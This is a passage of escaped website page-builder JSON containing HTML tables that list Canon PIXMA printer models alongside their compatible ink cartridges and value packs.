width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment 